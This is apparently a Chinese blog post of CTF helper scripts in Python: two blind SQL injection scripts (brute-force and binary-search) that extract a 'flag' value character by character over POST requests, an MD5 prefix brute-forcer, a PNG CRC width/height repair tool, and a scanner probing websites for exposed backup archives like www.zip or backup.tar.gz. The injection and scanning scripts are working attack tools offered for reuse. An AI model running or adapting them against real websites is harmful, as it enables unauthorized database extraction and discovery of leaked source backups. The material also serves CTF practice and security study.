标签:脚本 url 备份 py crc32 flag time print import
POST盲注(暴力)
from requests import *
import time
url = ''
payload = {"id" : ""}
flag = ""
for i in range(1,10000000000):#flag长度
time.sleep(0.06)
for j in range(20, 126):#可见字符ascii范围
payload["id"] = "if((ascii(substr((select(flag)from(flag)),{0},1))={1}),1,0)".format(i, j)
now = post(url, payload)
time.sleep(0.04)
if "Hello" in now.text:#Hello改为回显信息
print(i)
flag += chr(j)
print(flag)
break
POST盲注(二分)
from requests import *
import time
url = ""
payload = {"id" : ""}
flag = ""
for i in range(1,200):#这里调多大都不会有影响,应为判断结束的条件是用空格判断的
time.sleep(0.06)
l = 20; r = 126; mid = (l + r) // 2
while(l < r):
payload["id"] = "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
res = post(url,payload)
time.sleep(0.04)
# print(payload)
if "Hello" in res.text:l = mid + 1#Hello改为回显信息
else:r = mid
mid = (l + r) // 2
if(chr(mid) == " "):break
flag += chr(mid)
print(flag)
print("flag: " ,flag)
MD5碰撞
import requests
import base64
import sys
import hashlib
def getMd5(index):
for i in range(100000,100000000):
x = i
md5 = hashlib.md5(str(x).encode("utf8")).hexdigest()
if md5[0:6] == index:
return x
a = input() # 需要碰撞的md5
print(getMd5(a))
CRC修复
import zlib
import struct
import argparse
import itertools
parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
help="输入同级目录下图片的名称")
args = parser.parse_args()
bin_data = open(args.f, 'rb').read()
crc32key = zlib.crc32(bin_data[12:29]) # 计算crc
original_crc32 = int(bin_data[29:33].hex(), 16) # 原始crc
if crc32key == original_crc32: # 计算crc对比原始crc
print('宽高没有问题!')
else:
input_ = input("宽高被改了, 是否CRC爆破宽高? (Y/n):")
if input_ not in ["Y", "y", ""]:
exit()
else:
for i, j in itertools.product(range(4095), range(4095)): # 理论上0x FF FF FF FF,但考虑到屏幕实际/cpu,0x 0F FF就差不多了,也就是4095宽度和高度
data = bin_data[12:16] + struct.pack('>i', i) + struct.pack('>i', j) + bin_data[24:29]
crc32 = zlib.crc32(data)
if(crc32 == original_crc32): # 计算当图片大小为i:j时的CRC校验值,与图片中的CRC比较,当相同,则图片大小已经确定
print(f"\nCRC32: {hex(original_crc32)}")
print(f"宽度: {i}, hex: {hex(i)}")
print(f"高度: {j}, hex: {hex(j)}")
exit(0)
Web敏感目录扫描
import requests
import time
print("网址:")
url = input()
li1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp', 'index.php']
li2 = ['tar', 'tar.gz', 'zip', 'rar', 'swp']
for i in li1:
for j in li2:
url_final = url + "/" + i + "." + j
r = requests.get(url_final)
print(i+'.'+j)
print(r)
time.sleep(1)
标签:脚本,
url,
备份,
py,
crc32,
flag,
time,
print,
import
From: https://www.cnblogs.com/master-lio/p/18018514